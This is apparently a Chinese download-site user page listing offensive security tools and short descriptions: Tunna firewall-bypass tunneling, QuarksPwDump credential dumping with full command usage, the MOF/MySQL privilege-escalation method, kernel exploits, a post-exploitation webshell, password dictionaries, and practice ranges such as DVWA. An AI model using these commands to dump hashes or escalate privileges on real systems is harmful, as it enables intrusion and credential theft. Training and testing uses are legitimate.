>Tunna:一款神奇的工具，它可以通过HTTP封装隧道通信任何TCP，以及用于绕过防火墙环境中的网络限制。 > 命令`python proxy.py -u http://192.168.70.129/conn.aspx -l 2345 -a 10.1.1.1 -r 3389 -s -v` 参数含义如下: : -l 表示本地监听的端口 -r 远程要转发的端口 -v 详细模式

2020-03-18

QuarksPwDump_v0.1.zip

先看简介 Quarks PwDump是一个Win32环境下系统授权信息导出工具，目前除此之外还木有没有任何一款工具可以导出如此全面的信息，支持这么多的OS版本，（包括xP/2003/Vista/7/2008/8），经测试相当稳定。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。这个工具没有注入任何进程，工作原理是神马呢，源代码值得读一下。源地址在这：http://code.google.com/p/quarkspwdump/ 可以导出 : - Local accounts NT/LM hashes + history 本地NT/LM哈希+历史登录记录 - Domain accounts NT/LM hashes + history 域中NT/LM哈希+历史登录记录 - Cached domain password 缓存里的域密码 - Bitlocker recovery information (recovery passwords & key packages) 使用了Bitlocker的恢复信息(恢复密码&关键包) 用法参考说明如下： quarks-pwdump.exe <option(s)> <NTDS file> Options :参数 –dump-hash-local /*Dump出本机HASH*/ -dump-hash-domain-cached /*Dump出域内缓存的Hash*/ -dump-hash-domain (NTDS_FILE must be specified) /*Dump出域内的Hash，NTDS_FILE必须被指定*/ –dump-bitlocker (NTDS_FILE must be specified) /*Dump出BitLocker遗留信息*/ –with-history (optional) -output-type JOHN/LC (optional, if no=>JOHN) /*导出为Lc4或John The Ripper支持的格式*/ –output FILE (optional, if no=>stdout) /*导出结果到文件*/ 木有其他系统请大家另行测试。如需导出可以 C:\>quarkspwdump --dump-hash-local --output c:\xxxxx C:\>quarkspwdump --dump-hash-local --output-type LC --output c:\xxxxx

2020-03-16

mof提权文件nullevt.mof

mof是windows系统的一个文件（在c:/windows/system32/wbem/mof/nullevt.mof）叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后，然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行，这个mof当中有一段是vbs脚本，这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp.exe编译执行。

2020-03-12

nc端口监听工具瑞士军刀

什么是nc nc是netcat的简写，有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用，被设计为一个简单、可靠的网络工具 nc的作用（1）实现任意TCP/UDP端口的侦听，nc可以作为server以TCP或UDP方式侦听指定端口（2）端口的扫描，nc可以作为client发起TCP或UDP连接（3）机器之间传输文件（4）机器之间网络测速 nc的控制参数不少，常用的几个参数如下所列： 1) -l 用于指定nc将处于侦听模式。指定该参数，则意味着nc被当作server，侦听并接受连接，而非向其它地址发起连接。 2) -p <port> 暂未用到（老版本的nc可能需要在端口号前加-p参数，下面测试环境是centos6.6，nc版本是nc-1.84，未用到-p参数） 3) -s 指定发送数据的源IP地址，适用于多网卡机 4) -u 指定nc使用UDP协议，默认为TCP 5) -v 输出交互或出错信息，新手调试时尤为有用 6）-w 超时秒数，后面跟数字 7）-z 表示zero，表示扫描时不发送任何数据前期准备准备两台机器，用于测试nc命令的用法主机A：ip地址 10.0.1.161 主机B：ip地址 10.0.1.162 两台机器先安装nc和nmap的包 yum install nc -y yum install nmap -y 如果提示如下-bash： nc： command not found 表示没安装nc的包 ———————————————— 版权声明：本文为CSDN博主「小毛毛2013」的原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接及本声明。原文链接：https://blog.csdn.net/u012486730/article/details/82019996

2020-03-11

漏洞利用EXP windows-kernel-exploits-master.zip

本地溢出提权首先要有服务器的一个普通用户权限，攻击者通常会向服务器上传本地溢出程序，在服务器端执行，如果系统存在漏洞，那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。

2020-03-10

后渗透专用的提权大马

木马（Trojan）,也称木马病毒，是指通过特定的程序（木马程序）来控制另一台计算机。木马通常有两个可执行程序：一个是控制端，另一个是被控制端。木马这个名字来源于古希腊传说（荷马史诗中木马计的故事，Trojan一词的特洛伊木马本意是特洛伊的，即代指特洛伊木马，也就是木马计的故事）。“木马”程序是目前比较流行的病毒文件，与一般的病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种主机的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种主机。木马病毒的产生严重危害着现代网络的安全运行。　　小马体积小，容易隐藏，隐蔽性强。大马体积比较大，功能多，危害大。

2020-03-10

passwod_17000.txt

密码字典，是配合密码破译软件所使用的。密码字典里包括许多人们习惯性设置的密码，这样可以提高密码破译软件的密码破译成功率和命中率，缩短密码破译的时间。如果一个人密码设置没有规律或很复杂，未包含在密码字典里，这个字典就没有用了，甚至会延长密码破译所需要的时间。

2020-03-03

typecho.tar.gz

关于名称的来历 Typecho 是由 type 和 echo 两个词合成的，来自于开发团队的头脑风暴。 Type，有打字的意思，博客这个东西，正是一个让我们通过打字，在网络上表达自己的平台。Echo，意思是回声、反馈、共鸣，也是PHP里最常见、最重要的函数，相信大部分PHP爱好者都是从 echo 'Hello,world!'; 开始自己的PHP编程之路的。名称就表明 Typecho 是一款博客程序，它在 GPL version 2 许可证下发行，基于 PHP (需要 PHP5 以上版本)构建,可以运行在各种平台上，支持多种数据库(Mysql, PostgreSQL, SQLite)。为什么开发 Typecho 源自开发团队在精神层面上的洁癖和狂热。在使用博客程序的大部分时间里，我们只是发几段文字，贴几张图片，不需要高级复杂的系统，需要的是一个简单快速的博客平台。在流行的开源程序中，满足我们要求的很少，于是我们决定自己动手，开发一款有性格的博客程序，并用开源协议发行。开发团队中的几个人都是 IT 从业者，在成长的过程中从开源世界里获益匪浅，这个项目也是我们对开源的一个回报。如何参与开发 Typecho Typecho 目前使用 Git 来控制程序版本，如果你想为 Typecho 贡献源代码，最好先弄明白 Git 的使用方法。我们目前把项目托管在 GitHub 上，任何 GitHub 用户都可以向我们贡献代码。参与的方式很简单，【Fork】一份 Typecho 的代码到你的仓库中，修改后提交，并向我们发起【Pull Request】申请，我们会及你的申请并及时对代码进行审查。审查通过后，你的代码将被【Merge】进我们的仓库中，这样你就会自动出现在贡献者名单里了，非常方便。

2020-03-03

xss闯关小游戏.zip

这是一款利用xss漏洞闯关的小游戏，无需连接数据库，共20关，非常适合网络安全攻防的初学者练习使用，使用及安装教程请看此链接，https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载

2020-02-25

DVWA-安全测试靶场.zip

Web应用程序(DVWA)是一个PHP / MySQL的Web应用程序,它是该死的脆弱。它的主要目标是成为一名安全专家援助法律环境中测试他们的技能和工具,帮助web开发人员更好地理解的过程确保web应用程序和帮助学生和老师了解web应用程序安全性控制教室环境。 DVWA的目的是实践中一些最常见的web漏洞 , 不同程度的困难 ,用一个简单直观的界面。一般的用法说明它取决于用户如何DVWA方法。要么通过每个模块工作在一个固定的水平,或选择任何模块和工作达到最高水平之前他们可以移动到下一个。没有一个固定的对象完成一个模块; 但是用户觉得他们应该成功地利用了系统尽他们可能会利用这个漏洞。请注意,有记录和无证的弱点用这个软件。这是故意的。你被鼓励尝试和发现尽可能多的问题。 DVWA还包括一个Web应用程序防火墙(WAF) PHPIDS,可以使在任何阶段进一步增加了困难。这将演示如何添加另一层的安全可能会阻止某些恶意行为。注意,还有各种各样的公共方法绕过这些保护(这可以被看作是一个扩展为更高级的用户)! 有一个帮助按钮在每个页面的底部,它允许您查看提示和技巧的脆弱性。还有额外的链接进一步背景阅读,这涉及到安全问题。

2020-02-19

ewebeditor编辑器.rar

ACCESS数据库的后台管理编辑器 ======================================================================================================== eWebEditor ASP版，使用ACCESS配置数据库，带后台管理。为保证安全，强烈建议用户开始使用就修改后台管理用户及密码。结构说明 ============================= admin ：后台管理相关图片 buttonimage ：按钮图片 css ：样式文件 db : 数据库文件 dialog ：对话框相关文件 example ：例子 include ：公用包含文件 sysimage ：系统图片 uploadfile ：默认的上传文件安装=============================1、解开压缩包，直接拷贝到站点或建虚拟；2、访问例子文件，看是否运行正常： 1) eWebEditor 标准调用和弹窗调用示例： http://127.0.0.1/ewebeditor/example/test1.asp 2) eWebEditor 远程文件上传示例： http://127.0.0.1/ewebeditor/_example/test2.asp3、如果显示正常信息，即表示安装已完成！使用=============================1、后台管理地址：http://127.0.0.1/ewebeditor/admin_default.asp 默认登录用户：admin 默认登录密码：admin ======================================================================================================== ╭═══════════════╮ ║ ║ ╭══════┤ ├══════╮ ║ ║ 单机游戏网 ║ ║ ║ ║ ║ ║ ║ ╰═══════════════╯ ║ ║ ║ ║声明： ║ ║ 1) 本站不保证所提供软件或程序的完整性和安全性。 ║ ║ 2) 请在使用前查毒。 ║ ║ 4) 转载本站提供的资源请勿删除本说明文件。 ║ ║ 5) 本站提供的程序均为网上搜集，如果该程序涉及或侵害到您║ ║ 的版权请立即写信通知我们。 ║ ║ 6) 本站提供软件只可供研究使用，请在下载24小时内删除, ║ ║ 切勿用于商业用途，由此引起一切后果与本站无关。 ║ ║ ║ ║ 1. 推荐使用：WinRAR V3.2以上版本解压本站软件 ║ ║ ║ ║ ║ ║ ║ ║ ╭───────────────────────╮ ║ ╰══┤ ├══╯ ╰───────────────────────╯

2020-02-17

C32Asm_setup.zip

C32ASM静态反汇编工具功能概述 C32Asm现具有如下功能：快速静态反汇编PE格式文件(Exe、Dll等) 提供Hex文件编辑功能，功能强大提供内存Dump、内存编辑、PE文件Dump、PE内存ImageSize修正等多种实用功能提供内存反汇编功能，提供汇编语句直接修改功能，免去OPCode的直接操作的繁琐提供反汇编语句彩色语法功能，方便阅读分析，能方便自定义语法色彩提供输入表、输出表、参考字符、跳转、调用、PE文件分析结果等显示提供方便的跳转、调用目标地址的代码显示提供汇编语句逐字节分析功能，有助于分析花指令等干扰代码提供对ord调用和非ord调用的import自定义解析功能提供PE文件格式的分析显示功能提供文件拖放功能，直接可以进行文件反汇编或编辑提供主文件命令行模式，方便加入右键菜单进行快速的文件操作提供快速书签定位，多行代码复制，代码注释功能

2020-02-15

TA关注的人 TA的粉丝

2020HW工具包.zip

冰蝎window版Behinder_v3.0_Beta_6_win .zip

upload-labs-master.zip

dedecmsV5.7靶机源码.zip

华军1433mssql数据库弱口令扫描工具

PEiD0.95.zip

Advanced_IP_Scanner IP扫描工具

mimikatz，ms14068

Invoke-WCMDump结合powershell进行密码获取

dirtycow脏牛linux提权exp

tunna实用工具

hash密码抓取工具大全

扫描工具大合集，包括代理、IP、端口、目录等扫描

CentOS 5.5提权exp

内网穿透工具Tunna-master.zip

QuarksPwDump_v0.1.zip

mof提权文件nullevt.mof

nc端口监听工具瑞士军刀

漏洞利用EXP windows-kernel-exploits-master.zip

后渗透专用的提权大马

passwod_17000.txt

typecho.tar.gz

xss闯关小游戏.zip

DVWA-安全测试靶场.zip

ewebeditor编辑器.rar

C32Asm_setup.zip

BurpSuite.zip

社会工程学_百度百科.pdf

谁能教我iapp怎么用

优秀小版主是什么？我想要一个，帮帮我

热门文章数据更新不及时

中国大陆人口已突破14亿——你是比以前更渺小了，还是被更多人所敬仰了？

一个高中学历，初学网安的退伍军人入行有多难

手机安装linux

Python要怎样用一行代码逆序输出自己本身的代码